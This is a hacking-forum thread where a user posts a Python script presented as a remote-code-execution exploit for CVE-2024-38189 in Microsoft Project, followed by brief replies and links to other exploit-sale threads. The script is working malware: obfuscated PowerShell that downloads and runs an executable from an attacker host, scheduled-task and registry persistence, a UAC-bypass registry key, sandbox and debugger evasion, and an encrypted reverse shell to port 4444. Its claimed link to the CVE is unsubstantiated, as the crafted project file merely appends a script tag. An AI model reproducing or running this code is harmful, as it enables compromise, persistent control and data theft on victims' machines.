Exploit CVE-2024-38189 RCE Microsoft Project.
by USDoD - Tuesday August 20, 2024 at 12:14 PM
#1
https://cve.mitre.org/cgi-bin/cvename.cg...2024-38189

Here is a python script for this CVE

pip install pycryptodome

python3 exploit_script.py

import os import base64 import platform import random import string import subprocess import ctypes import sys import socket import struct import time from Crypto.Cipher import AES from Crypto.Util.Padding import pad, unpad # Global Configuration KEY = b'secretkey1234567'  # 16-byte key for AES encryption IV = os.urandom(16)  # Random Initialization Vector for AES def advanced_obfuscate_payload(payload):     """Obfuscate payload using multiple techniques including AES encryption."""     # Step 1: XOR with key     xor_key = 'key123'     xor_payload = ''.join(chr(ord(c) ^ ord(xor_key[i % len(xor_key)])) for i, c in enumerate(payload))         # Step 2: AES encryption     cipher = AES.new(KEY, AES.MODE_CBC, IV)     encrypted_payload = cipher.encrypt(pad(xor_payload.encode('utf-8'), AES.block_size))         # Step 3: Reversing and Base64 encoding     reversed_payload = encrypted_payload[::-1]     final_payload = base64.b64encode(reversed_payload).decode('utf-8')     return final_payload def generate_metamorphic_payload():     """Generate a metamorphic payload that changes both structure and content."""     base_payload = "powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden "     metamorphic_parts = [         "Invoke-WebRequest -Uri http://attacker_ip/malicious.exe",         "Start-Process C:\\Windows\\Temp\\{}.exe".format(random_string(8)),         "Start-Sleep -s {}".format(random.randint(1, 5))     ]     random.shuffle(metamorphic_parts)     return base_payload + "; ".join(metamorphic_parts) def execute_in_memory_advanced():     """Execute payload directly in memory using advanced techniques."""     payload = generate_metamorphic_payload()     obfuscated_payload = advanced_obfuscate_payload(payload)     exec_cmd = f"powershell -enc {obfuscated_payload}"     subprocess.run(exec_cmd, shell=True) def create_stealth_malicious_project_file(filename):     """Create a more stealthy malicious Project file with advanced obfuscated payload."""     try:         with open(filename, 'wb') as f:             f.write(b'MSPJ\x00\x00\x00\x01')  # Header             f.write(os.urandom(300))  # Increased random padding             f.write(os.urandom(100))  # Enhanced fuzzing             payload = generate_metamorphic_payload()             obfuscated_payload = advanced_obfuscate_payload(payload)             script_tag = f"<script>exec(base64.b64decode('{obfuscated_payload}').decode('utf-8'))</script>"             f.write(script_tag.encode('utf-8'))             f.write(os.urandom(150))  # Additional random data         print(f"Stealth Malicious Project file created: {filename}")     except Exception as e:         print(f"Failed to create malicious project file: {e}") def add_stealth_persistence():     """Add stealthier persistence with advanced methods."""     try:         if platform.system() == 'Windows':             # Advanced persistence techniques             persistence_cmds = [                 "schtasks /create /sc onlogon /tn 'System Maintenance' /tr 'C:\\path\\to\\malicious.exe' /ru SYSTEM",                 "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v 'Windows Defender' /t REG_SZ /d 'C:\\path\\to\\malicious.exe'",                 "powershell -Command \"Start-Process -FilePath 'C:\\Windows\\System32\\cmd.exe' -ArgumentList '/c start C:\\path\\to\\malicious.exe' -NoNewWindow\"",                 "powershell -Command \"New-Object -ComObject WScript.Shell\"",                 "reg add HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command /t REG_SZ /d 'C:\\path\\to\\malicious.exe'"             ]             for cmd in persistence_cmds:                 subprocess.run(cmd, shell=True, check=True)         print("Stealth persistence added successfully.")     except Exception as e:         print(f"Failed to add stealth persistence: {e}") def establish_secure_command_and_control():     """Establish a secure and encrypted reverse shell to a remote C2 server."""     try:         host = 'attacker_ip'         port = 4444         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)         s.connect((host, port))                 while True:             command = s.recv(1024)             decrypted_command = decrypt_command(command)             if decrypted_command.lower() == "exit":                 break             output = subprocess.getoutput(decrypted_command)             encrypted_output = encrypt_output(output)             s.send(encrypted_output)         s.close()     except Exception as e:         print(f"Failed to establish secure C2: {e}") def decrypt_command(command):     """Decrypt command from C2 server."""     cipher = AES.new(KEY, AES.MODE_CBC, IV)     decrypted_command = unpad(cipher.decrypt(command), AES.block_size).decode('utf-8')     return decrypted_command def encrypt_output(output):     """Encrypt output before sending to C2 server."""     cipher = AES.new(KEY, AES.MODE_CBC, IV)     encrypted_output = cipher.encrypt(pad(output.encode('utf-8'), AES.block_size))     return encrypted_output def is_admin():     """Check if the script is running with administrative privileges."""     try:         return ctypes.windll.shell32.IsUserAnAdmin() != 0     except AttributeError:         return False def random_string(length):     """Generate a random string of given length."""     return ''.join(random.choices(string.ascii_letters + string.digits, k=length)) # Environmental detection to evade sandbox def detect_virtualization_advanced():     """Advanced check for virtualization and sandbox environments."""     known_virtual_envs = ['VBOX', 'VMware', 'VirtualBox', 'Xen', 'QEMU', 'Hyper-V']     try:         output = subprocess.check_output("wmic baseboard get product,manufacturer", shell=True).decode()         for env in known_virtual_envs:             if env in output:                 print("Virtual environment detected. Exiting.")                 sys.exit(0)         if is_debugger_present():             print("Debugger detected. Exiting.")             sys.exit(0)     except Exception as e:         print(f"Failed to detect virtualization or debugging: {e}") def is_debugger_present():     """Check if the script is being run under a debugger."""     return any(['OllyDbg' in process for process in os.popen('tasklist').read().strip().split('\n')]) # Main execution flow detect_virtualization_advanced() create_stealth_malicious_project_file("exploit.mpp") add_stealth_persistence() establish_secure_command_and_control()
Ban reason: Self-Ban | https://raidforums.su/Forum-Ban-Appeals if you wish to be unbanned in the future. (Permanent)
Reply
#2
very Interesting, have you tested this?
Reply
#3
Look easy on the eyes. Interesting?
Reply
#4
Look easy on the eyes. Interesting?
Reply
#5
and he was never seen again Confused
Buy me drugs - XMR: 4B6cZTNV2gmcMR2PQLTf4jC7phySw87nZLznwfYZQ6DLHZ9PiPfpF4XB17tpLXagN7HKAxQWp4gL78KYryr7ScvXQTaoFVz
Autism Corporation®
[Image: image.png]
Reply
#6
wish you come bck mate
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [Sell] Calix GPON - Preauth RCE 0day ericki 1 286 06-29-2026, 06:41 AM
Last Post: johnmalkovich1202
  Ban Any Discord Exploit PhineasFisher 6 298 02-08-2026, 11:49 PM
Last Post: skype
  CVE-2025-40554 - SolarWinds Web Help Desk Auth Bypass & RCE PoC miyako 3 76 02-07-2026, 03:32 PM
Last Post: cysc
  POC CVE-2025-24071 caca28sapo1 15 807 02-07-2026, 08:53 AM
Last Post: hacker0123
  HPE OneView RCE Exploit [CVE-2025-37164] Hawx01 8 263 02-06-2026, 07:08 PM
Last Post: hacker0123



 Users browsing this thread: 1 Guest(s)